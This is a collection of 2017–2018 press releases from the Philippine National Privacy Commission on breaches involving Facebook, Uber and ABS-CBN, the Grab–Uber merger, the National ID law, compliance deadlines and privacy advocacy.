The NPC became an ICDPPC member in October 2016 after passing membership requirements and demonstrating commitment to global standards in protecting personal data and privacy in the Philippines. At the time, the NPC was only several months old, having been formed in March that same year. Since then, the NPC steadily advocated for the Philippines and the Asian regional voice to resonate in the global forum.
It has co-authored resolutions on: artificial intelligence, e-learning, conference census, and the future of the conference. It is also sitting in the working group for cross-border privacy law enforcement. The Philippines has always been cited for its creative approaches and constructive stakeholder engagement.
###
-
PH joins 40th Int’l. Privacy Commissioners’ Conference
Comments Off on PH joins 40th Int’l. Privacy Commissioners’ ConferenceBRUSSELS, BELGIUM --- The National Privacy Commission (NPC) is representing the Philippines in the 40th International Conference of Data Protection and Privacy Commissioners (ICDPPC), a premier global forum connecting the efforts of about 119 privacy and data protection authorities from over 70 countries across the globe.
The NPC’s chairman and Philippine Privacy Commissioner Raymund Enriquez Liboro said this marks the third time the country is taking part in the event. “Since we’ve been granted full membership status in 2016, the Philippines have shown active participation in the global forum becoming a strong voice in its own right in discussions around privacy enforcement,” Liboro said.
“We have always strived to present the Filipino context in particular and the Asian milieu in general, pointing to the diverse approaches present in the Asian region and thus, the different cultural contexts that actually influence data privacy concepts and practices,” Liboro added.
Happening just a few months after the EU’s General Data Protection Regulation came into force in May, this year’s conference will be held on October 22-26, focusing on digital ethics as its theme.
“There is no better time to put the spot light on the ethical dimension of data protection than today, when we are right on the cusp of major technology shifts of the digital era and unprecedented cross-border data flows happening globally,” Liboro said.
The conference will have a closed session (only for accredited members and observers) and a public conference. Among the activities to be conducted during the closed session are the election of a 5-member executive committee that works on the agenda of the Conference for the next two-years; setting up of working groups; voting on proposed resolutions and declarations; defining the conference’s strategic direction; and deciding on membership applications. Election of ICDPPC’s next 5-member board will take place on the second day of the conference, October 23.
It was in October 2016 when ICDPPC granted full membership status to the NPC after passing membership requirements and demonstrating commitment to strict standards in protecting personal data and privacy in the Philippines. At the time, the NPC was only several months old, having been formed in March that same year. Since then, the NPC steadily advocated for the Asian regional voice to resonate in the global forum.
# # #
-
UPDATED: PRESS STATEMENT OF PRIVACY COMMISSIONER RAYMUND ENRIQUEZ LIBORO ON FACEBOOK’S LATEST BREACH
Comments Off on UPDATED: PRESS STATEMENT OF PRIVACY COMMISSIONER RAYMUND ENRIQUEZ LIBORO ON FACEBOOK’S LATEST BREACH1. At around 12:49 AM of September 28, we received informal notice from Facebook representatives that they had found a vulnerability in their app that was exploited by malicious attackers.
2. Facebook claims that the vulnerability affected around fifty million users, exposing personal data stored in their Facebook profiles.
3. The vulnerability was attributed to a combination of several programming errors in updates made in July 2017. As a result, malicious intruders were able to generate access tokens.
4. These access tokens allowed the intruders to log into affected FB profiles as if they were the actual profile holders. This means they had the ability to access data reserved for account holders even without having to enter the user's password.
5. As a remediation measure, FB terminated the sessions of persons it identified as having been affected and had them enter their login credentials again. This morning, the company has notified affected users of the incident. We have informed Facebook, however, that the notification it sent to individuals leaves much to be desired.
6. According to the company’s representatives, the investigation is still in its early stages. They have not determined yet how many Filipinos are affected and whether misuse of personal information had resulted from this breach.
7. The NPC has prescribed breach management procedures in place and we expect Facebook to abide by these rules.
8. The NPC shall notify the public about developments and its actions on this matter. To protect themselves, all Facebook users must enable multi-factor authentication on all platforms, employ strong passwords, and practice good digital hygiene. For more information on how to love yourself online, see https://www.privacy.gov.ph/30-ways/
Privacy Commissioner Raymund Enriquez Liboro
# # #
-
Gov’t. taps “hack bayani” community to help secure PhilSys, data-driven public projects
Comments Off on Gov’t. taps “hack bayani” community to help secure PhilSys, data-driven public projects1. Privacy Commissioner Raymund Enriquez Liboro is tapping the assistance of white hat hackers in the country to help secure Philippine cyberspace and help create robust public ICT systems in the country beginning with the soon-to-be implemented national identification card.
2. “We can do a lot more to help protect the data that will come out of PhilSys processing. You can do your part in it as well as “hackers ng bayan” and indeed I strongly urge you to help government make this right. The need for your voice is now more acute. Your country needs you more than ever,” Liboro told the crowd of local hackers who converged yesterday for the 2-day RootCon 12 at Taal Vista Hotel in Tagaytay City.
3. Commissioner Liboro said one of the biggest challenges for the government today is to deliver basic services at the same level of efficiency as the private sector, which he said can only be done through digital transformation.
4. “The challenge right now, mga kababayan, is that our people expect the government to give the same level of efficiency that they get from the private sector. Meaning, it’s no longer enough for government now to simply reform. It must pursue rapid, robust and sometimes bold transformation. And we must transform digitally,” Liboro said.
5. The privacy commissioner believes the fastest and safest route to digital transformation would be through an active collaboration between the government and patriotic hackers.
6. “As the country’s leading experts on the offensive and defensive aspects of data security, you as “hackers ng bayan” or “hack-bayani”, are at the center of every data protection effort. It is you who will design and implement the structures that keep our data safe. No longer will you be the unsung heroes keeping our boat afloat. You will be at the vanguard, keeping threats and hazards at bay, so that everyone’s data will remain safely private,” Liboro said.
7. Around 300 local “hackers of all colors” joined the RootCon 2018, from infosec professionals of the corporate world to members of the so-called “digital underground”. Information Security Officers Group (ISOG) officers Archieval Tolentino and Dan Duplito said the Commissioner’s call on “hack bayani” to help the government sends a very positive signal to the Filipino hacking and security community.
8. “I like the idea behind “hack bayani” and I think it’s about time that we do it, especially with the NPC leading this era of [privacy] awakening for the people, and especially for hackers. It would lead to a shift in the way people see hackers,” Tolentino said.
9. “Aside from just looking for vulnerabilities [in government systems] I think “hack bayanis” may also help by protecting and defending government [digital interests], when needed,” Duplito said.
10. During the event, Liboro also announced an upcoming project between the NPC and the Philippine Statistics Authority called “hackBAYAN” where at least thirty local white hats shall be enlisted to help PhilSys managers fully gauge the risks of running it, help identify potential problem areas, and implement appropriate risk reduction and mitigation strategies.
11. hackBAYAN is a Delphi study that runs the course of over two weeks. Liboro said the results of this study will serve as a guide for securing PhilSys and provide a pattern for many similar collaborations aimed at fortifying public digital institutions.
# # #
-
Updated: Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the Data Breach Incident of ABS-CBN’s online Stores
Comments Off on Updated: Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the Data Breach Incident of ABS-CBN’s online StoresRELEASE 01 - September 19, 2018
1. News of a possible data breach of ABS-CBN’s online stores has reached the National Privacy Commission this morning, where customers reportedly face the possibility of theft of their financial data due to a payment skimmer which has been discovered by a Dutch security researcher.
2. At 12:37 PM, the Commission has received a breach notification from the company’s Data Protection Officer (DPO), Jay C. Gomez. At around the same time, the company has also publicly disclosed the incident on Twitter.
3. We expect ABS-CBN’s DPO to act in accordance with breach management standards set forth by the Commission, and fully set in motion its breach response protocols, including the safeguarding of their systems and the prevention of possible harms to affected data subjects.
4. The National Privacy Commission is monitoring the situation and expect ABS-CBN to send us a full report on the incident within five days.
RELEASE 02 - October 12, 2018
5. The National Privacy Commission received ABS-CBN’s full report of the data breach on September 24, at 7:51 PM. This is within the 5-day deadline required for its submission, as mandated in NPC Circular 16-03.
6. The report shows that ABS-CBN learned of the breach incident at 8:18 AM of September 19, through a ZDNet online article published nine hours earlier. About 25 minutes later, the company reported the incident to its Managed Security Service Provider (MSSP) to assist in the investigation and containment efforts.
7. The MSSP found a “malicious java script” from the ABS-CBN online store, which prompted management to instruct its third-party vendor to take the website down. The compromised site was taken down on September 19, at 9:28 AM.
8. The malicious code or backdoor program captures a customer’s payment card information while an online purchase transaction is in progress. Thus, the attacker was able to illegally obtain in real-time, the personal data of affected customers, including their name, credit card number, its expiration date, as well as the card verification number. Other data collected were the data subject’s email address, phone number, and residential address.
9. The attacker uploaded the malicious code on August 16 and it remained active until the site was taken down. The credit card data of those who transacted with the site from August 16 until September 18 were presumed to be compromised.
10. The online store has forty-four thousand registered users. During the period when the site was compromised, there were a total of 208 validated purchase transactions from unique customers. The company said, within 72 hours upon discovery of the breach, it was able to inform 202 affected data subjects through email and/or cell phone message. There were 6 customers, however, who either did not provide a contact number or has an invalid email address, which they would have to reach via postage mail.
11. Affected data subjects were advised by ABS-CBN to immediately inform their bank and credit card provider and change their password. They were also warned not to give any personal or financial information to anyone who may claim to be a company representative
12. Users of the UAAP Online Store were not affected. Management took it down only as a precautionary measure since it points to the same payment gateway and uses the same provider platform as the compromised site.
13. Oddly, the MSSP also found suspicious logins from one of the administrator accounts of the third-party vendor, which the concerned administrator acknowledged to be not his.
14. ABS-CBN then required its third-party vendor to reset all passwords and use two-factor authentication.
15. Upon examining the breach report submitted by ABS-CBN, the NPC investigation team summoned DPO Gomez for clarification on September 27.
16. Citing the MSSP’s report, Gomez said the incident is likely a coordinated attack and part of the massive card skimming campaign of cyber-criminal and threat group Magecart.
17. We note that had ABS-CBN insisted its third-party developer to use multi-factor authentication earlier, the site would not have been compromised.
18. The National Privacy Commission treats every instance of data breach with grave concern as it potentially puts at risk people’s data privacy.
19. In this regard, we strongly advise Personal Information Controllers (PICs) and Personal Information Processors (PIPs) to monitor their systems regularly, and have security checks in place, including the full implementation of at least two-factor authentication.
20. The National Privacy Commission’s investigation of the breach incident is still on-going and we appreciate the continued cooperation of ABS-CBN management.
# # #
-
Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the President's Signing of the National ID Law
Comments Off on Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the President's Signing of the National ID Law1. President Rodrigo Roa Duterte has signed the National ID law on the 6th of August 2018, creating the Philippine Identification System to improve the delivery of government and other services to the public, especially those who lack government-issued identification cards.
2. The National Privacy Commission supports the proper implementation of this law in accordance with its role in the technical working group led by NEDA and PSA; and in line with the Commission's dual mandate to "protect the fundamental human right of privacy, of communication while ensuring free flow of information to promote innovation and growth," as inscribed in the Data Privacy Act of 2012 (DPA).
3. We have provided the implementing agency with advice and guidance to address the privacy risks identified at the early stage of project design. The public may rest assured that the NPC shall continuously press for the adoption of internationally accepted data protection and privacy standards in the implementation of the National ID, such as the deployment of a Privacy by Design approach, and the adoption and comprehensive application of the NPC’s Data Privacy Accountability & Compliance Framework.
4. In the implementation of the National ID System, the PSA, together with the NPC, shall endeavor to ensure the full protection of the people’s data privacy rights.
###
-
5 gov’t. agencies to jointly handle telco consumer complaints
Comments Off on 5 gov’t. agencies to jointly handle telco consumer complaintsThe government will launch an all-out, synchronized effort to promptly deal with consumer complaints on telco services such as those involving data privacy violations, text-scams, vanishing load, unauthorized charges, defective product, and denial of subscription plan activation, among others, Privacy Commissioner Raymund Enriquez Liboro said on Friday.
Liboro said the National Privacy Commission (NPC) is jointly working with the Department of Trade and Industry (DTI), Department of Information and Communications Technology (DICT), National Telecommunications Commission (NTC) and the Department of Justice (DOJ) on a draft joint administrative order (JAO) aimed at providing a more efficient way of resolving telco consumer concerns.
"Following the lead of the DTI, it should be noted that we are looking beyond just addressing consumer concerns here. This joint effort is aimed to serve as a component of the high-trust society, as envisioned in Ambisyon 2040, which is based on the building of responsive institutions that people can depend on," Liboro said.
On Tuesday, high-ranking representatives of the five agencies met with consumer groups inside the NPC's office at the PICC Convention Center in Pasay City for the first of series of public consultations on the JAO.
In the draft JAO, the NPC shall have primary and sole authority to deal with cases involving alleged violations of the Data Privacy Act and take cognizance of matters related to privacy and data protection.
The DTI shall deal with complaints involving legal or regulatory violations related to defective products, non-conformity or violation on the terms and conditions on a misleading advertisement, fraudulent sales promo, deceptive sales practices and other complaints related to warranty.
The NTC shall handle cases involving legal or regulatory violations related to text scams/spam messages, vanishing load, denial of subscriptions plan application, electronic billing, fair use policy, lock-in period, poor technical/customer service care and accessibility, unauthorized charges, and value-added service.
For the public's convenience, DTI Undersecretary Ruth B. Castelo said among the salient features of the draft JAO is the so-called "no wrong door policy" where consumers may lodge complaints via any of the receiving agencies, regardless of its nature. For instance, a privacy-related e-billing complaint may be filed with the DICT office, which shall then endorse it to the NPC or the DTI depending on its merits. After taking appropriate action, the concerned agency shall then inform the endorsing agency and the complainant of the action taken.
Should there be a need to institute criminal action after having resolved the complaint, the concerned agency shall then refer the matter to the DOJ for the conduct of criminal investigation and prosecution of offenders, in accordance with existing laws, rules, and regulations.
# # #
-
Celebrate Filipino Data Privacy Rights on Privacy Awareness Week 2018 --NPC
Comments Off on Celebrate Filipino Data Privacy Rights on Privacy Awareness Week 2018 --NPCIn the wake of the recent spate of media reports linked to data breaches and other privacy-related concerns, the National Privacy Commission (NPC) is urging business, government and civil society organizations to participate in the upcoming Privacy Awareness Week (PAW) on May 28 to 31 and publicly commit to the safeguarding of people’s personal data.
Privacy Commissioner Raymund Enriquez Liboro said the privacy issues that recently struck the food service industry should be taken as a wake-up call for the entire business community as well as all organizations that process personal data.
"There's no better time than today to combat the growing threats to the safety of our personal data. And there's no better way to do this than as a community, which is what the PAW activities hope to foster," Liboro said.
PAW is a celebration of people's data privacy rights along with all the benefits of data privacy protection, such as better customer trust, greater competitive advantage and stronger protection of company assets.
"All of us are data subjects so PAW is a community celebration. For organizations, it means showcasing your sense of responsibility and assuring your customers and constituents that the personal data they entrusted you is in good hands. For the rest of us, it's a reminder that we can assert our data privacy rights, that we have a personal responsibility to protect it however we can," Liboro said.
With this year's theme focused on "Protecting the Filipino's Right to Data Privacy", the NPC spearheads the weeklong festivities with a 2-day summit of data protection officers (DPOs) from various sectors all over the country. Dubbed as the 1st National Data Privacy Conference, the flagship event is set on May 28 - 29, at the Philippine International Convention Center in Pasay City.
Around 2,000 DPOs are expected to join the event, comprising of delegates from the academe, civil society, top corporations and the government.
During the conference, the NPC will also launch a year-long social awareness campaign focusing on responsible digital citizenship among Filipinos. Called the “Privacy, Safety, Security and Trust (PSST!) Online” or PSST!, the campaign is aimed at arming Filipinos with the information and self-help tools they can use to protect themselves and their loved-ones from the dangers arising from the careless handling of their own personal data when using online applications and services on their mobile and desktop devices.
Personal Information Controllers (PICs) and Personal Information Processors (PIPs) or organizations processing personal data, are also expected to get into the PAW festivities in their own way, and celebrate data subject empowerment in a manner that would be meaningful to their customers, members and employees.
The Privacy Awareness Week or PAW is an annual international effort to draw public attention towards privacy issues and the importance of protecting personal information. It is held across territories of the members the Asia Pacific Privacy Authorities (APPA) Forum, which include Australia, British Columbia, Canada, Colombia, Hong Kong, Japan, Republic of Korea, Macao, Mexico, New South Wales, New Zealand, Peru, Queensland, Singapore, FCC - United States, FTC - United States, Northern Territory -Australia, Victoria – Australia. This year marks the second time that the Philippines will officially celebrate PAW in solidarity with other APPA members and other privacy adherents all over the world.
# # #
-
NPC investigates multiple government website breach
Comments Off on NPC investigates multiple government website breach1. The National Privacy Commission (NPC) yesterday summoned the management and other responsible officials of seven schools, institutions, and local government units as it investigates data breaches they sustained following an organized attack on government and commercial organizations last April 1, 2018.
2. The privacy body earlier sent notice to top officials of Taguig City University; the Department of Education offices in Bacoor City and Calamba City; the Province of Bulacan; Philippine Carabao Center; Republic Central Colleges in Angeles City; and Laguna State Polytechnic University, to appear before it from April 23 to 24. This, to explain why they did not notify, within 72 hours of the breach, the NPC nor the affected data subjects, whose personal data were made available for download via links posted on Facebook.
3. As of yesterday, none of the affected organizations were able to issue any data breach notifications whatsoever, as part of their obligations as Personal Information Controllers (PICs) under the Data Privacy Act of 2012. “PICs are required to employ organizational, technical, and physical measures to protect personal data,” said Privacy Commissioner Raymund Enriquez Liboro. “This includes the duty to inform data subjects and this Commission if there is a serious data breach.”
4. The move comes after digital investigators from the National Privacy Commission determined that each of the exposed databases contained sensitive personal information or information that could be used to perpetuate identity fraud; that the exposed data is in the hands of unauthorized persons; and that the exposure of the data raises a real risk of serious harm to the affected data subjects.
5. In its initial estimate, the NPC said the combined number of exposed records in the breach were those of at least 2,000 individual data subjects. They include their name, address, phone number, email address, and in some instances, even passwords and school details.
# # #
-
NPC opens probe on Facebook
Comments Off on NPC opens probe on FacebookThe National Privacy Commission (NPC) is opening an investigation on Facebook following Mark Zuckerberg's admission of the company's faults in the Cambridge Analytica data scandal that affected Filipino Facebook users.
In a formal letter addressed to Zuckerberg, the NPC is requiring Facebook to submit a number of documents relevant to the case, to establish the scope and impact of the incident to Filipino data subjects.
“We are launching an investigation into Facebook to determine whether there is unauthorized processing of personal data of Filipinos, and other possible violations of the Data Privacy Act of 2012,” an excerpt of the letter sent to Zuckerberg reads. The letter was signed by Privacy Commissioner Raymund Enriquez Liboro and Deputy Commissioners Ivy Patdu and Leandro Aguirre.
The privacy watchdog will particularly look into how Facebook shares the personal data of Filipino users with third parties. It will also address the bigger picture of protecting the data privacy rights of the millions of Filipinos who use Facebook in their daily lives.
On Thursday, the NPC decided to launch a formal investigation to seek more concrete actions from Facebook.
-
Joint Press Statement from Privacy Commissioner Raymund Enriquez Liboro and LTFRB Board Member Atty. Aileen Lourdes Lizada
Comments Off on Joint Press Statement from Privacy Commissioner Raymund Enriquez Liboro and LTFRB Board Member Atty. Aileen Lourdes Lizada1. In the common pursuit of protecting the rights and interests of drivers and the commuting public, the National Privacy Commission (NPC) and the Land Transportation Franchising and Regulatory Board (LTFRB) are jointly looking into the transaction details of the announced Grab-Uber acquisition. Since this acquisition potentially involves personal data, the NPC is keen on safeguarding data subjects’ privacy in the process.
2. Our intention is neither to hinder any legitimate business exchange, nor prevent the public from using the services of Grab, so long as personal data privacy is respected and protected. The NPC is closely looking into this deal given consumer fears that the company’s dominant market position might lead to possible abuses in how it processes personal data.
3. In this regard, we call on Grab to be fully transparent as to what will happen with the personal data of around 1.2 million Filipino Uber account holders, and to ensure that these data are lawfully processed in the course of the acquisition. Transparency, choice, notice, security, redress mechanisms & other data privacy issues should be considered at all stages of the deal.
4. Grab must implement appropriate organizational, physical and technical security measures , if the acquisition will involve any personal data processing. Mechanisms to accommodate the public’s data privacy concerns relating to the deal should also be present.
5. The NPC assures the public that it shall exercise its compliance and monitoring functions to check for any unauthorized processing during the acquisition, especially given that data subjects may have limited capacity to check it, themselves.
6. On a related note, regarding the proposal to require public utility vehicles to install closed-circuit television and global position system devices, we would like to assure the riding public that the NPC and the LTFRB are working closely to ensure that people’s right to data privacy are fully protected and respected, in accordance with the law.
###
-
Press Statement from Privacy Commissioner Raymund Enriquez Liboro on the Facebook Controversy involving Cambridge Analytica
Comments Off on Press Statement from Privacy Commissioner Raymund Enriquez Liboro on the Facebook Controversy involving Cambridge Analytica1. The National Privacy Commission (NPC) has been in touch with Facebook since information on the controversy involving Cambridge Analytica rose to prominence following whistleblower allegations in March 2018.
2. On March 27, the NPC met with Facebook representatives to look into the matter and ascertain if and to what extent, Filipino users were affected. Facebook told the NPC that 558 Filipino users installed Aleksandr Kogan’s personality quiz app, through which personal data may have been “improperly shared with Cambridge Analytica”. From this, 1,175,312 more Filipinos may have been subsequently affected via sharing, making the Philippines the second most affected country in terms of total number of data subjects.
3. Given this magnitude, the NPC required Facebook to provide updates on the measures taken to mitigate the risks that ensued from the controversy. The company said it plans to restrict data access of third parties on Facebook starting April 9. In the process, users shall also be notified if their information may have been improperly shared with Cambridge Analytica.
4. Mark Zuckerberg claims he values the trust of his customers. This incident involving Cambride Analytica clearly puts this to question. While Facebook claims remediation is underway, we continue to call on Facebook to face us Filipinos with a new level of transparency. This should begin with their terms of service and settings that could be unclear to users. The process by which Facebook monitors third party app developers and tech providers who may have access to Filipino user data should also be looked into. This is to ensure that adequate protective nets are in place to guard against any abuse or misuse of data.
5. We assure the public that we will continue to look into this to ensure that no further harm is done against data subjects. Facebook will be asked to shed more light on the matter and explain further its privacy policies and practices. We will involve the public in these discussions.
6. In the meantime, we call on Filipino Facebook users to be circumspect in using the platform and exercise online personal vigilance. Users should minimize the personal information they share online and maximize the use of existing privacy protection features and tools. We encourage the public to exercise a new level of care about their privacy and to take part in forming the future of Facebook in the country.
###
-
Statement of Privacy Commissioner Raymund Enriquez Liboro On the Uber and Grab Merger
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro On the Uber and Grab Merger-
Yesterday, both Uber and Grab issued public statements announcing the sale of Uber’s TNV and food delivery business in Southeast Asia to Grab. From these statements, we understand that the Uber service will no longer be available in Southeast Asia including the Philippines, from 8 April 2018. In the interim, Grab is to take Uber’s drivers onboard the Grab TNV platform. In the same statement, Grab also made it known that Uber users will need to download and register with Grab to use their TNV services.
- Shortly after these public statements, Grab, through counsel Atty. John Paul Nabua assured the National Privacy Commission of their continued cooperation and compliance with Philippine data privacy and protection laws. Grab also declared to the Commission that there will be no sharing of any user data between Uber and Grab. Uber users and drivers will be required to register anew with Grab to allow them to use the Grab TNV platform.
- We have called on Grab to a meeting next week to enlighten the Commission on this "sale” particularly its provision on the processing of Filipino drivers’ and users’ data and the measures they take in protecting these data. As the biggest TNV provider in the Philippines after the exit of Uber, we want Grab to demonstrate that they could “walk the talk” when it comes to protecting personal data and upholding the data privacy rights of its drivers and users.
-
This sale does not affect our ongoing investigation into past Uber breaches that involved Filipino users. This investigation is continuing and a report would be out soon.
Raymund Enriquez Liboro
Privacy Commissioner
National Privacy Commission
Republic of the Philippines# # #
-
-
NPC extends data processing systems registration for covered professionals
Comments Off on NPC extends data processing systems registration for covered professionalsThe National Privacy Commission (NPC) is extending up to July 2 the registration period for the data processing systems (DPS) of individual Personal Information Controllers (PICs) and individual Personal Information Processors (PIPs), specifically for covered professionals. These include medical doctors, lawyers, accountants and dentists, among others, who process personal data and satisfy the criteria for mandatory DPS registration.
Privacy Commissioner Raymund Enriquez Liboro said the adjusted registration schedule applies only to individual PICs and PIPs. All other PICs and PIPs are still covered by the March 8 DPS registration deadline, as earlier mandated by the NPC.
"We are not extending the March 8 deadline for all other PICs and PIPs; however, the NPC shall continue accepting late submissions,” Liboro said.
Liboro also clarified that individual PICs and PIPs are excluded from the coverage of Appendix 1 of NPC Circular 17-01, which provides an initial determination of sectors or institutions mandated to register as the personal data processing they conduct is likely to pose a risk to the rights and freedoms of data subjects or is not occasional. As such, registration is only mandatory for individual PICs and PIPs that have at least two hundred fifty employees; or that process sensitive personal information of at least one thousand individuals.
“DPS registration is a compliance requirement for PICs and PIPs. It is also a way to demonstrate accountability in safeguarding personal data. The Commission notes the efforts of PICs and PIPs to be data privacy compliant,” Liboro said.
PICs and PIPs who have successfully created their user account with the NPC’s online portal and finished their registration for the year have the option to access and update their registration data on a regular basis.
PICs and PIPs who have registration-related issues and concerns are advised to contact [email protected].
-
NPC extends deadline of 2017 annual incident report to June 30
Comments Off on NPC extends deadline of 2017 annual incident report to June 30Organizations and professionals processing personal data in the country now have until June 30 to submit their first annual security incident report to the National Privacy Commission (NPC) after the agency adjusted the deadline, which was initially set on March 31.
The annual security incident report is among the yearly compliance obligations of Personal Information Controllers (PICs), as provided for in the IRR of the Data Privacy Act of 2012, and as discussed in NPC Circular 16-03. It contains all security incidents of the PIC from January 1 to December 31, 2017, including a summary of every breach incident and aggregate data of non-breach incidents.
"We are intent on coming up with a version of the annual report that is more concise and easier for DPOs to prepare. At the same time, the Commission is also seeking ways to align the annual report with the requirements of other privacy regulations on international data flows such as the GDPR and APEC-CBPR," said Privacy Commissioner Raymund Enriquez Liboro.
The Commission is expected to announce specific changes in the annual security incident report in a few weeks. Meantime, Liboro said annual reports that have already been submitted by PICs based on present guidelines would be considered sufficient for the year.
-
Privacy Commission cautions DOH on sharing of Dengvaxia master list
Comments Off on Privacy Commission cautions DOH on sharing of Dengvaxia master listPRESS RELEASE
The National Privacy Commission (NPC) has advised the Department of Health (DOH) to be circumspect in sharing sensitive personal information of individuals, saying it should only do so if it deems that such sharing or disclosure is authorized under law, adheres to data privacy principles, and there are reasonable and appropriate security measures in place to protect the data.
In an advisory opinion dated 26 February 2018 issued in response to the formal request made by the DOH, Privacy Commissioner Raymund Enriquez Liboro said the disclosure to another government agency or private entity of a copy of the DOH master list of individuals vaccinated with Dengvaxia must be “provided for by existing laws and regulations or a data subject has given his or her consent.”
“We emphasize that the government is one of the biggest repositories of the personal data of citizens. The government or its agencies, however, do not have the blanket authority to access or use the information about private individuals under the custody of another agency,” Liboro said.
The DOH Dengvaxia master list has recently been subject of access requests coming from the Public Attorney’s Office (PAO), some private organizations, and members of the media. The information contained in the list is considered as sensitive personal information, and relates to minors, which the NPC identifies as a vulnerable group of data subjects.
In the advisory opinion, Liboro said personal data provided to government or public authorities may be processed without consent when it is done pursuant to the particular agency’s constitutional or statutory mandate, and subject to the requirements of the Data Privacy Act of 2012 (DPA).
In the case of the request by the PAO to obtain the DOH master list, this general rule does not apply. The agency, however, may be allowed access to the data of the specific victims it represents as their duly authorized legal counsel.
“Should the PAO be authorized as the legal representative of the minor data subjects, they may then be provided information on the particular data subject they are representing, subject to the presentation of proof of such authorization,” Liboro said.
As to the request of media and other private organizations, Liboro said the disclosure of statistical or aggregated data, without any personal or sensitive personal information, should suffice. Otherwise, the release of a copy of the master list in its raw version would be tantamount to an unwarranted invasion of personal privacy.
# # #
-
NPC sets March deadline for submission of 2017 Annual Security Incident Report of personal information controllers
Comments Off on NPC sets March deadline for submission of 2017 Annual Security Incident Report of personal information controllersPRESS RELEASE
1. Personal Information Controllers (PICs) in the country may begin submitting their 2017 Annual Security Incident Report to the National Privacy Commission (NPC), from January 3 to March 31, 2018.
2. The law requires all PICs to submit an Annual Security Incident Report, even if the PIC concerned does not need to register with the NPC. The Annual Security Incident Report contains information on the security incidents that affect personal data under a PIC’s control, including the number of security incidents that affect personal data in each calendar year.
3. Under the various circulars of the NPC, PICs must document adverse events that have an impact on the availability, integrity, or confidentiality of personal data, even if these adverse events prove unsuccessful. These events are defined in Philippine data privacy laws as security incidents:
SECTION 3. Definition of Terms. For the purpose of this Circular, the following terms are defined, as follows:
xxx
J. “Security incident” is an event or occurrence that affects or tends to affect data protection, or may compromise the availability, integrity, and confidentiality of personal data. It shall include incidents that would result to a personal data breach, if not for safeguards that have been put in place.”
a. It goes without saying that data breaches that must be reported within 72 hours to the NPC and to the affected data subjects must be included in the Annual Security Incident Report.
b. Where a brute force attack into a database containing personal information was stopped by a timely intervention on the part of the PICs information security team, that event should also be included in the Annual Security Incident Report.
c. With more reason, an unauthorized alteration in a database that alters the personal records of an individual, to that individual’s detriment, must be included in the Annual Security Incident Report.
d. Also, a cyberattack that successfully uncovers industrial secrets that do not involve the processing of personal data may be considered a security incident under Philippine data privacy law, and as such, needs to be included in the Annual Security Incident Report.
4. Privacy Commissioner and Chairman Raymund Enriquez Liboro today said the window is meant to give PICs ample time to prepare a complete report. “We want to give PICs ample opportunity to audit their privacy program and improve their organization’s efficiency in the way they manage their security incidents. These reports are an essential signpost of any PIC’s commitment to protecting the personal data of its customers and employees. I encourage the PICs concerned to check the NPC website for further guidance,” Liboro said.
5. "When properly collated, the data becomes an invaluable management resource that enables a PIC to assess its reaction time for every crucial event. From the moment an incident occurred to its discovery, and to the time it took for the internal breach response team to properly diagnose the situation, decide on an action, deploy contingency measures and notify the NPC if necessary. The PIC must find ways to reduce time lags whenever possible. It amounts to mitigating potential harm to data subjects," he added.
6. To submit the 2017 annual report, a PIC may send the document on or before the deadline via email to [email protected].
7. Under Philippine data privacy laws, a PIC is a person or organization (including all public and private entities) who controls the collection, holding, processing or use of personal information. The term also includes a person or organization who instructs another person or organization to collect, hold, process, use, transfer or disclose personal information on his or her behalf.
*Updated on 1 February 2018; originally published on 4 January 2018
# # #
-
NPC launches PH-wide data protection drive for LGUs in Region 11
Comments Off on NPC launches PH-wide data protection drive for LGUs in Region 11DAVAO CITY, Philippines - The National Privacy Commission (NPC) recently launched its nationwide campaign here on how local government units (LGUs) can start their journey to compliance and reap the benefits of the Data Privacy Act of 2012.
Speaking to Davao Region LGU chief executives and representatives on Monday last week at DPO11: The LGU Data Protection Officers’ Assembly, Privacy Commissioner and Chairman Raymund Enriquez Liboro underscored the importance of systematic compliance, saying it will foster greater trust in the way local governments work among businesses executives and the general public. This will also allow citizens to enjoy the benefits from local government projects like the Listahanan and other initiatives, worry-free and in a secure manner.
"Filipinos experience government service on a more personal level when they avail of social services offered at city and town halls. If LGUs in the region would rigorously enforce data privacy safeguards in their daily operations, not only will it usher in better local government administration and enhanced social services. It will also redound to improved business practices and usher in the region's readiness to absorb the economic benefits of the emerging knowledge economy," Liboro told the event participants.
Local chief executives and representatives from as far back as Compostela Valley, Sarangani, San Isidro, Buhangin, and Tagum City were among those who gathered for the event at the Marco Polo Davao hotel at Claro M. Recto street in Davao City for the whole-day event, which is the first in a series of assemblies to be organized by the NPC for LGUs.
To aid Davao government DPOs in quickly building their capability in facilitating the compliance of their respective offices, the NPC has provided them with the second edition of the NPC Privacy Toolkit. Designed to help new DPOs progressively build their competence and confidence on the job, the toolkit serves as a practical reference for day-to-day use.
In her written message of support for the summit, Davao City Mayor Sara Z. Duterte commended the NPC and the Region 11 office of the Department of Interior and Local Government (DILG), which helped set up the event, expressing her hope that the campaign for data privacy protection would promote npot just innovation and growth but also promote national security.
“Local government are entrusted with millions of personal data information, and so we have to ensure that we have written data privacy policies governing personal information controllers on what to do and how to secure the data that is entrusted to them. At the same time, it is also vital that clients are made aware of their rights and responsibilities over the information they release,” part of Mayor Duterte’s message reads.
The DPO11 assembly is intended to meet the particular needs of government DPOs in a local government setting, beginning with Region 11. It is the eleventh in a series of DPO assemblies organized by the NPC on a sectoral basis, tailor-fitting compliance to meet varying data protection issues across sectors and industries.
-
Latest Statement of Privacy Commissioner Raymund Enriquez Liboro on the Uber Personal Data Breach
Comments Off on Latest Statement of Privacy Commissioner Raymund Enriquez Liboro on the Uber Personal Data Breach- Today, Uber made public additional information earlier made available to us on their 2016 data breach. We were informed that around 171,000 Filipino citizens consisting of drivers and passengers were affected by the breach. We understand this to be based on the mobile phone numbers included in the registry. We were also informed that the exposure of the affected data subjects was limited to their registered name, e-mail address, and phone number.
- We are looking now at the processes and procedures that Uber claims they have taken to ensure that this matter never happens again. We are paying particular attention to the steps taken to ensure that in the future, data breaches of this magnitude will not be concealed from regulators and from affected data subjects.
- In line with this, we have summoned them to appear before the Commission to further explain their data processing operations particularly the organizational, technical and physical security measures Uber Philippines is implementing to protect Filipino drivers and riders.
- We remind the public that the concealment of data breaches that involve sensitive personal information or data is a criminal offense.
